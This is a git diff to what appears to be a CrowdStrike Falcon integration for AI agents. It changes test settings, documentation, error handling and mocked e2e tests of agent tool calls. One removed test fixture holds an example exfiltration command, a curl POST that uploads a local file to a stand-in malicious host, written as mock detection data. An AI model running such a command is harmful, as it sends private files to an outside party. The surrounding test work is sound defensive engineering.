CrowdStrike · cristianmessel-cs · Jul 2, 2025 · Jul 1, 2025 · Jul 1, 2025 · Jul 1, 2025
diff --git a/.env.example b/.env.example
@@ -13,3 +13,5 @@ FALCON_CLIENT_SECRET=your-client-secret
 # OPENAI_API_KEY=your-openai-api-key
 # OPENAI_BASE_URL=https://your-custom-llm-endpoint.com/v1  # Custom LLM API endpoint for testing
 # MODELS_TO_TEST=example-model-1,example-model-2  # Comma-separated list of models to test
+# RUNS_PER_TEST=2
+# SUCCESS_TRESHOLD=0.7
diff --git a/docs/e2e_testing.md b/docs/e2e_testing.md
@@ -94,17 +94,23 @@ The E2E tests use a retry mechanism to handle the non-deterministic nature of LL
 The retry configuration can be found at the top of `tests/e2e/utils/base_e2e_test.py`:
 
 ```python
-# Models to test against
-MODELS_TO_TEST = ["gpt-4.1-mini", "gpt-4o-mini"]
-# Number of times to run each test
-RUNS_PER_TEST = 2
-# Success threshold for passing a test
-SUCCESS_THRESHOLD = 0.7
+# Default models to test against
+DEFAULT_MODLES_TO_TEST = ["gpt-4.1-mini", "gpt-4o-mini"]
+# Default number of times to run each test
+DEFAULT_RUNS_PER_TEST = 2
+# Default success threshold for passing a test
+DEFAULT_SUCCESS_TRESHOLD = 0.7
 ```
 
 This means each test will run 2 times for each model and the test will pass if at least 70% of the runs succeed.
 
-You can override the models to test using the `MODELS_TO_TEST` environment variable:
+Each of these can be overridden by using the appropriate environment variable:
+
+- MODELS_TO_TEST
+- RUNS_PER_TEST
+- SUCCESS_THRESHOLD
+
+For example:
 
 ```bash
 # Test with Claude models

diff --git a/src/modules/intel.py b/src/modules/intel.py
@@ -52,7 +52,7 @@ def query_actor_entities(
         offset: Optional[int] = Field(default=0, ge=0, description="Starting index of overall result set from which to return ids."),
         sort: Optional[str] = Field(default=None, description="The property to sort by. (Ex: created_date|desc)"),
         q: Optional[str] = Field(default=None, description="Free text search across all indexed fields."),
-    ) -> Dict[str, Any]:
+    ) -> List[Dict[str, Any]]:
         """Get info about actors that match provided FQL filters.
 
         Args:
@@ -80,16 +80,21 @@ def query_actor_entities(
         logger.debug("Searching actors with params: %s", params)
 
         # Make the API request
-        response = self.client.command(operation, parameters=params)
+        command_response = self.client.command(operation, parameters=params)
 
         # Handle the response
-        return handle_api_response(
-            response,
+        api_response = handle_api_response(
+            command_response,
             operation=operation,
             error_message="Failed to search actors",
             default_result=[]
         )
 
+        if self._is_error(api_response):
+            return [api_response]
+
+        return api_response
+
     def query_indicator_entities(
         self,
         filter: Optional[str] = Field(default=None, description="FQL query expression that should be used to limit the results."),
@@ -131,22 +136,20 @@ def query_indicator_entities(
         logger.debug("Searching indicators with params: %s", params)
 
         # Make the API request
-        response = self.client.command(operation, parameters=params)
+        command_response = self.client.command(operation, parameters=params)
 
         # Handle the response
-        result = handle_api_response(
-            response,
+        api_response = handle_api_response(
+            command_response,
             operation=operation,
             error_message="Failed to search indicators",
             default_result=[]
         )
 
-        # If handle_api_response returns an error dict instead of a list,
-        # it means there was an error, so we return it wrapped in a list
-        if isinstance(result, dict) and "error" in result:
-            return [result]
+        if self._is_error(api_response):
+            return [api_response]
 
-        return result
+        return api_response
 
     def query_report_entities(
         self,
@@ -155,7 +158,6 @@ def query_report_entities(
         offset: int = Field(default=0, ge=0, description="Starting index of overall result set from which to return ids."),
         sort: Optional[str] = Field(default=None, description="The property to sort by. (Ex: created_date|desc)"),
         q: Optional[str] = Field(default=None, description="Free text search across all indexed fields."),
-        include_deleted: Optional[bool] = Field(default=False, description="Flag indicating if both published and deleted reports should be returned."),
     ) -> List[Dict[str, Any]]:
         """Get info about reports that match provided FQL filters.
 
@@ -165,7 +167,6 @@ def query_report_entities(
             offset: Starting index of overall result set from which to return ids.
             sort: The property to sort by. (Ex: created_date|desc)
             q: Free text search across all indexed fields.
-            include_deleted: Flag indicating if both published and deleted reports should be returned.
             fields: The fields to return, or a predefined set of fields in the form of the collection name surrounded by two underscores.
 
         Returns:
@@ -178,7 +179,6 @@ def query_report_entities(
             "offset": offset,
             "sort": sort,
             "q": q,
-            "include_deleted": include_deleted,
         })
 
         # Define the operation name
@@ -187,19 +187,19 @@ def query_report_entities(
         logger.debug("Searching reports with params: %s", params)
 
         # Make the API request
-        response = self.client.command(operation, parameters=params)
+        command_response = self.client.command(operation, parameters=params)
 
         # Handle the response
-        result = handle_api_response(
-            response,
+        api_response = handle_api_response(
+            command_response,
             operation=operation,
             error_message="Failed to search reports",
             default_result=[]
         )
 
         # If handle_api_response returns an error dict instead of a list,
         # it means there was an error, so we return it wrapped in a list
-        if self._is_error(result):
-            return [result]
+        if self._is_error(api_response):
+            return [api_response]
 
-        return result
+        return api_response
diff --git a/tests/e2e/modules/test_incidents.py b/tests/e2e/modules/test_incidents.py
@@ -24,11 +24,13 @@ async def test_logic():
                     "validator": lambda kwargs: kwargs.get('parameters', {}).get('limit') == 100,
                     "response": {
                         "status_code": 200, 
-                        "body": [
-                            {"id": "score-1", "score": 50, "adjusted_score": 60},
-                            {"id": "score-2", "score": 70, "adjusted_score": 80},
-                            {"id": "score-3", "score": 40, "adjusted_score": 50}
-                        ]
+                        "body": {
+                            "resources": [
+                                {"id": "score-1", "score": 50, "adjusted_score": 60},
+                                {"id": "score-2", "score": 70, "adjusted_score": 80},
+                                {"id": "score-3", "score": 40, "adjusted_score": 50}
+                            ]
+                        }
                     }
                 }
             ]
@@ -41,7 +43,7 @@ async def test_logic():
         def assertions(tools, result):
             self.assertGreaterEqual(len(tools), 1, "Expected at least 1 tool call")
             used_tool = tools[len(tools) - 1]
-            self.assertEqual(used_tool['input']['tool_name'], "show_crowd_score")
+            self.assertEqual(used_tool['input']['tool_name'], "falcon_show_crowd_score")
 
             # Verify the output contains the expected data
             output = json.loads(used_tool['output'])
@@ -71,7 +73,7 @@ async def test_logic():
             fixtures = [
                 {
                     "operation": "QueryIncidents",
-                    "validator": lambda kwargs: "status:'open'" in kwargs.get('parameters', {}).get('filter', ''),
+                    "validator": lambda kwargs: "state:'open'" in kwargs.get('parameters', {}).get('filter', ''),
                     "response": {"status_code": 200, "body": {"resources": ["incident-1", "incident-2"]}}
                 },
                 {
@@ -118,15 +120,15 @@ def assertions(tools, result):
             self.assertEqual(used_tool['input']['tool_name'], "falcon_search_incidents")
 
             # Verify the tool input contains the filter
-            tool_input = json.loads(used_tool['input']['tool_input'])
+            tool_input = used_tool['input']['tool_input']
             self.assertIn("open", tool_input.get('filter', '').lower())
 
             # Verify API call parameters
             self.assertGreaterEqual(self._mock_api_instance.command.call_count, 2, "Expected at least 2 API calls")
 
             # Check QueryIncidents call
             api_call_1_params = self._mock_api_instance.command.call_args_list[0][1].get('parameters', {})
-            self.assertIn("status:'open'", api_call_1_params.get('filter', ''))
+            self.assertIn("state:'open'", api_call_1_params.get('filter', ''))
 
             # Check GetIncidents call
             api_call_2_body = self._mock_api_instance.command.call_args_list[1][1].get('body', {})
@@ -184,7 +186,7 @@ def assertions(tools, result):
             self.assertEqual(used_tool['input']['tool_name'], "falcon_get_incident_details")
 
             # Verify the tool input contains the incident ID
-            tool_input = json.loads(used_tool['input']['tool_input'])
+            tool_input = used_tool['input']['tool_input']
             self.assertIn("incident-3", tool_input.get('ids', []))
 
             # Verify API call parameters
@@ -210,7 +212,7 @@ async def test_logic():
             fixtures = [
                 {
                     "operation": "QueryBehaviors",
-                    "validator": lambda kwargs: "severity:'critical'" in kwargs.get('parameters', {}).get('filter', ''),
+                    "validator": lambda kwargs: "tactic:'Defense Evasion'" in kwargs.get('parameters', {}).get('filter', ''),
                     "response": {"status_code": 200, "body": {"resources": ["behavior-1", "behavior-2"]}}
                 },
                 {
@@ -222,21 +224,11 @@ async def test_logic():
                             "resources": [
                                 {
                                     "id": "behavior-1",
-                                    "scenario": "Suspicious Process Activity",
-                                    "tactic": "Execution",
-                                    "technique": "Command-Line Interface",
-                                    "severity": "critical",
-                                    "confidence": "high",
-                                    "timestamp": "2023-01-15T12:30:00Z"
+                                    "tactic": "Defense Evasion",
                                 },
                                 {
                                     "id": "behavior-2",
-                                    "scenario": "Suspicious Network Connection",
-                                    "tactic": "Command and Control",
-                                    "technique": "Non-Standard Port",
-                                    "severity": "critical",
-                                    "confidence": "medium",
-                                    "timestamp": "2023-01-15T13:45:00Z"
+                                    "tactic": "Defense Evasion",
                                 }
                             ]
                         }
@@ -246,7 +238,7 @@ async def test_logic():
 
             self._mock_api_instance.command.side_effect = self._create_mock_api_side_effect(fixtures)
 
-            prompt = "Find all critical severity behaviors"
+            prompt = "Find behaviors with the tactic 'Defense Evasion'"
             return await self._run_agent_stream(prompt)
 
         def assertions(tools, result):
@@ -255,25 +247,24 @@ def assertions(tools, result):
             self.assertEqual(used_tool['input']['tool_name'], "falcon_search_behaviors")
 
             # Verify the tool input contains the filter
-            tool_input = json.loads(used_tool['input']['tool_input'])
-            self.assertIn("critical", tool_input.get('filter', '').lower())
+            tool_input = used_tool['input']['tool_input']
+            self.assertIn("tactic", tool_input.get('filter', '').lower())
 
             # Verify API call parameters
             self.assertGreaterEqual(self._mock_api_instance.command.call_count, 2, "Expected at least 2 API calls")
 
             # Check QueryBehaviors call
             api_call_1_params = self._mock_api_instance.command.call_args_list[0][1].get('parameters', {})
-            self.assertIn("severity:'critical'", api_call_1_params.get('filter', ''))
+            self.assertIn("tactic:'Defense Evasion'", api_call_1_params.get('filter', ''))
 
             # Check GetBehaviors call
             api_call_2_body = self._mock_api_instance.command.call_args_list[1][1].get('body', {})
             self.assertEqual(api_call_2_body.get('ids'), ["behavior-1", "behavior-2"])
 
             # Verify result contains behavior information
             self.assertIn("behavior-1", result)
-            self.assertIn("Suspicious Process Activity", result)
             self.assertIn("behavior-2", result)
-            self.assertIn("Suspicious Network Connection", result)
+            self.assertIn("Defense Evasion", result)
 
         self.run_test_with_retries(
             "test_search_behaviors",
@@ -294,15 +285,7 @@ async def test_logic():
                             "resources": [
                                 {
                                     "id": "behavior-3",
-                                    "scenario": "Data Exfiltration Attempt",
                                     "tactic": "Exfiltration",
-                                    "technique": "Data Transfer Size Limits",
-                                    "severity": "high",
-                                    "confidence": "high",
-                                    "timestamp": "2023-03-10T08:15:00Z",
-                                    "device_id": "device-123",
-                                    "filename": "/tmp/suspicious.bin",
-                                    "cmdline": "curl -X POST https://malicious-site.com/upload --data-binary @/tmp/sensitive.dat"
                                 }
                             ]
                         }
@@ -321,7 +304,7 @@ def assertions(tools, result):
             self.assertEqual(used_tool['input']['tool_name'], "falcon_get_behavior_details")
 
             # Verify the tool input contains the behavior ID
-            tool_input = json.loads(used_tool['input']['tool_input'])
+            tool_input = used_tool['input']['tool_input']
             self.assertIn("behavior-3", tool_input.get('ids', []))
 
             # Verify API call parameters
@@ -331,9 +314,7 @@ def assertions(tools, result):
 
             # Verify result contains behavior information
             self.assertIn("behavior-3", result)
-            self.assertIn("Data Exfiltration Attempt", result)
             self.assertIn("Exfiltration", result)
-            self.assertIn("high", result.lower())  # Severity
 
         self.run_test_with_retries(
             "test_get_behavior_details",